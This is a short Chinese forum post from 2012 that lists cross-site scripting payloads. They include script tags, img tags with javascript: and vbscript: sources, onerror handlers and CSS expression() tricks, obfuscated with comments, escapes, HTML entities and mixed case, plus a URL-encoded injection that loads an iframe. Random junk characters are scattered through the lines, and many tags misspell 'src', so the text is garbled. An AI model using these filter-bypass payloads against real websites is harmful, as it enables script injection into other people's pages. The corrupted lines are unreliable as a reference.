<script>alert("跨站")</script> (最常用)1 B1 } ^: l% o7 Q" M
<img scr=javascript:alert("跨站")></img>2 v1 R9 D; `* ]! [$ s$ u1 V
<img scr="javascript: alert(/跨站/)></img>
: ^) S- m5 V5 A9 l O) @( m3 V<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)! x1 S2 b9 P, z8 [9 \
<img scr="#" onerror=alert(/跨站/)></img>8 B8 U! e* x# d
<img scr="#" style="xss:expression(alert(/xss/));"></img>
# s4 z% \) p1 P" o' K<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)3 b- w* I2 k( g
<img src=vbscript:msgbox ("xss")></img>
7 g, D1 Y- |* W4 e<style> input {left:expression (alert('xss'))}</style>, W- V9 l. V* z6 @' N+ `
<div style={left:expression (alert('xss'))}></div>6 x+ W+ x7 B6 Q/ W
<div style={left:exp/* */ression (alert('xss'))}></div>: u( Z1 F& Q$ f# z, k: O
<div style={left:\0065\0078ression (alert('xss'))}></div>" T) \1 k) K: `
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>0 h6 S3 h9 j7 J/ x9 _# }
unicode <div style="{left:expRessioN (alert('xss'))}">
4 b& b# ?4 V* }
! N) B, `9 o4 b"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
1 Q3 a* {- B9 Y6 k P* r9 E |
发表于 2012-9-15 14:09:13
收藏
支持
反对